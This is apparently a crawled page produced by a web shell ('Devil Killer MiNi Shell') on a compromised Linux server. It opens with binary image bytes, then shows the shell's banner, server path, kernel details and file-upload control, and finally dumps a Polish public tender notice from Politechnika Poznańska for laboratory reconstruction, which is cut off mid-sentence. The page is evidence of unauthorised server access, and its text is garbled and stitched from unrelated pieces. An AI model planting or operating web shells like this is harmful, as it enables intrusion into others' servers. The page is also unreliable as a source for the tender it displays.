JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230727/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230727/0032930301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa pomieszczeń ZMiSP w formule „zaprojektuj i wybuduj” – modernizacja w związku z projektem Mapa drogowa – Narodowa Sieć Metrologii Współrzędnościowej NSMET w budynku CMBIN PP </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Poznańska</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamowień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001608</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Marii Skłodowskiej-Curie 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-965</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">monika.dyja@put.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.put.poznan.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa pomieszczeń ZMiSP w formule „zaprojektuj i wybuduj” – modernizacja w związku z projektem Mapa drogowa – Narodowa Sieć Metrologii Współrzędnościowej NSMET w budynku CMBIN PP </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d8a8c851-2c80-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00329303</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Mapa drogowa – Narodowa Sieć Metrologii Współrzędnościowej NSMET nr POIR.04.02.00-00-D012/20-00 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d8a8c851-2c80-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl. oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu<br/>Platformy (adres poczty elektronicznej: monika.dyja@put.poznan.pl)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu »Wykonawca« na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa »Regulamin Platformy e- Zamówienia«, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce »Centrum Pomocy«.<br/>2) Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>3) Możliwość korzystania w postępowaniu z »Formularzy do komunikacji« w pełnym zakresie wymaga posiadania konta<br/>»Wykonawcy« na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z »Formularzy do<br/>komunikacji« służących do zadawania pytań dotyczących treści dokumentów zamówienia (dotyczy w szczególności SWZ)<br/>wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e- Zamówienia.<br/>4) Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce<br/>5) maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza). Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych<br/>wraz z ofertą to 250 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE „RODO” informujemy, że:<br/>„Politechnika Poznańska, pl. Marii Skłodowskiej-Curie 5, 60-965 Poznań<br/>Kontakt: biuro.rektora@put.poznan.pl, telefon: 61 665 3639<br/>1) administratorem Pani/Pana danych osobowych jest Politechnika Poznańska, pl. Marii Skłodowskiej-Curie 5, 60-965 Poznań<br/>kontakt: biuro.rektora@put.poznan.pl, telefon: 61 665 3639<br/>2) administrator wyznaczył Inspektora Danych Osobowych, Pana mgr Piotra Otomańskiego, z którym można się kontaktować pod<br/>adresem e-mail: : iod@put.poznan.pl,<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AD/ZP/106/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa pomieszczeń ZMiSP w formule „zaprojektuj i wybuduj” – modernizacja w związku z projektem Mapa drogowa – Narodowa Sieć Metrologii Współrzędnościowej NSMET w budynku CMBIN Politechniki Poznańskiej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45214000-0 - Roboty budowlane w zakresie budowy obiektów budowlanych związanych z edukacją i badaniami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31625000-3 - Alarmy przeciwpożarowe</p> <p class="mb-0">31625200-5 - Systemy przeciwpożarowe</p> <p class="mb-0">38424000-3 - Urządzenia pomiarowe i sterujące</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45214000-0 - Roboty budowlane w zakresie budowy obiektów budowlanych związanych z edukacją i badaniami</p> <p class="mb-0">45214400-4 - Roboty budowlane w zakresie obiektów budowlanych związanych ze szkolnictwem wyższym</p> <p class="mb-0">45214410-7 - Roboty budowlane w zakresie politechnik</p> <p class="mb-0">45214600-6 - Roboty budowlane w zakresie budowy badawczych obiektów budowlanych</p> <p class="mb-0">45214610-9 - Roboty budowlane w zakresie budynków laboratoryjnych</p> <p class="mb-0">45231500-0 - Roboty budowlane w zakresie budowy rurociągów sprężonego powietrza</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45314200-3 - Instalowanie linii telefonicznych</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45314310-7 - Układanie kabli</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">45315000-8 - Instalowanie urządzeń elektrycznego ogrzewania i innego sprzętu elektrycznego w budynkach</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45350000-5 - Instalacje mechaniczne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">48421000-5 - Pakiety oprogramowania do zarządzania urządzeniami</p> <p class="mb-0">51700000-9 - Usługi instalowania sprzętu przeciwpożarowego</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71250000-5 - Usługi architektoniczne, inżynieryjne i pomiarowe</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71321000-4 - Usługi inżynierii projektowej dla mechanicznych i elektrycznych instalacji budowlanych</p> <p class="mb-0">71321200-6 - Usługi projektowania systemów grzewczych</p> <p class="mb-0">71321400-8 - Usługi konsultacyjne w zakresie wentylacji</p> <p class="mb-0">71323100-9 - Usługi projektowania systemów zasilania energią elektryczną</p> <p class="mb-0">71325000-2 - Usługi projektowania fundamentów</p> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował kryteriami oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Wykonawcy prowadzący działalność gospodarczą lub zawodową muszą być wpisani do jednego z rejestrów zawodowych<br/>lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że<br/>a. posiada w banku lub spółdzielczej kasie oszczędnościowo-kredytowej środki finansowe lub zdolność kredytową, w<br/>wysokości co najmniej 1.500.000,00 zł.;<br/>b. posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę gwarancyjną co<br/>najmniej 2.000.000,00 zł.;<br/>c. posiada minimalne roczne przychody w zakresie działalności objętej zamówieniem w wysokości nie mniejszej niż<br/>3.000.000,00 zł netto w każdym z ostatnich trzech lat obrotowych.<br/>4) zdolności technicznej lub zawodowej:<br/>a. Wykonawca musi wykazać, że zrealizował (zakończył), jako strona umowy w okresie ostatnich 5 lat* przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie roboty<br/>budowlane w zakresie wykonania instalacji sanitarnych HVAC i ogólnobudowlanych o wartości nie mniejszej niż 1.000.000<br/>zł brutto każda, w budynkach użyteczności publicznej lub przemysłowych, przy czym przynajmniej jedna z robót powinna<br/>być zrealizowana w budynku czynnym (normalnie użytkowanym).<br/>W przypadku gdy wartość wykazywanego zamówienia określona została w walucie innej niż wskazana przez<br/>Zamawiającego Wykonawca przeliczy ją według średniego kursu NBP na dzień zatwierdzenia protokołu odbioru robót lub<br/>równoważnego dokumentu, podając datę zatwierdzenia protokołu/ dokumentu i kurs walut.<br/>* Okresy wyrażone w latach liczy się wstecz od dnia w którym upływa termin składania ofert.<br/>b. Wykonawca musi wykazać osobę, która zostanie skierowana do realizacji zamówienia posiadającą kwalifikacje<br/>zawodowe, uprawnienia i doświadczenie niezbędne do wykonania zamówienia, a także wskazać zakres wykonywanej przez<br/>nią czynności oraz Wykonawca musi wykazać, że będzie dysponował osobą podając podstawę dysponowania tą osobą:<br/>1)Kierownik robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/>wodociągowych i kanalizacyjnych -1-<br/>Wymagane uprawnienia<br/>Wymagane uprawnienia do kierowania robotami budowlanymi bez ograniczeń w zakresie specjalno-ści instalacyjnej w<br/>zakresie sieci, instalacji i urzą-dzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,<br/>Doświadczenie zawodowe:<br/>min. 3 letnie doświadczenie w pełnieniu funkcji kierownika robót w wyżej wymienionej specjalności, w tym kierowanie<br/>przynajmniej dwoma robotami instalacyjnymi w w/w specjalności, o wartości nie mniejszej niż 800.000,00 zł brutto każda, w budynkach użyteczności publicznej lub przemysłowych<br/>2) Kierownik robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych-<br/>1-Wymagane uprawnienia<br/>Wymagane uprawnienia do kierowania robotami budowlanymi bez ograniczeń w zakresie specjalno-ści: instalacyjnej w<br/>zakresie sieci, instalacji i urzą-dzeń elektrycznych i elektroenergetycznych,<br/>Doświadczenie zawodowe:<br/>min. 3 letnie doświadczenie w pełnieniu funkcji kierownika robót w w/w specjalności, w tym kierowanie przynajmniej dwoma<br/>robotami instalacyjnymi w w/w specjalności, o wartości nie mniejszej niż 300.000,00 zł brutto każda, w budynkach<br/>użyteczności publicznej lub przemysłowych.<br/>3) Kierownik robót w specjalności konstrukcyjno-budowlanej-1-Wymagane uprawnienia<br/>Wymagane uprawnienia do kierowania robotami budowlanymi bez ograniczeń w zakresie specjalno-ści:<br/>konstrukcyjnobudowlanej<br/>Doświadczenie zawodowe:<br/>min. 3 – letnie doświadczenie w pełnieniu funkcji kierownika robót w w/w specjalności lub kierownika budowy, w tym<br/>kierowanie przynajmniej dwoma robotami budowlanymi o wartości nie mniejszej niż 300.000,00 zł brutto każda, w<br/>budynkach użyteczności publicznej lub przemysłowych.<br/>4) Projektant w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i<br/>kanalizacyjnych-1-Wymagane uprawnienia<br/>Wymagane uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji 